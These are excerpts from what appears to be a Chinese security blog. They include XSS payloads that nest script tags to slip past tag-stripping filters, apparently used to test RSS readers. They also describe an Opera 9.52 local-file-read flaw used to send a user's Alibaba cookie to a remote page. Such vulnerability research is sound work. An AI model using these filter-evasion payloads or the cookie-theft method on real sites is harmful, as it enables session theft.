<s<script></script>cript>alert("hackedbykxlzx")<<script></script>/script>
<<script></script>script>alert("hackedbykxlzx")<<script></script>/script>
恩,放这里测几个rss的阅读器。
[……]
<s<script></script>cript>alert("hackedbykxlzx")<<script></script>/script>
<<script></script>script>alert("hackedbykxlzx")<<script></script>/script>
恩,放这里测几个rss的阅读器。
[……]
在前文《opera9.52使用ajax读取本地文件漏洞》
中,提到了opera的ajax读取本地文件漏洞。
但是利用方式上,比较狭隘。
很少人会专门下载htm文件到本地,然后打开。
但是动态语言(php,asp等)只要修改header,就可以指定让用户下载。
[……]
这也可能是一个安全特性吧,opera可以使用ajax读取本地文件。
ff3没有这个漏洞。
不废话,看代码吧。
利用方式如下:
这段代码保存为本地htm文件,然后使用opera打开。
将会把本地用户名为administrator在alibaba的cookie,发送到http://inbreak.net/kxlzxtest/testxss/a.php
[……]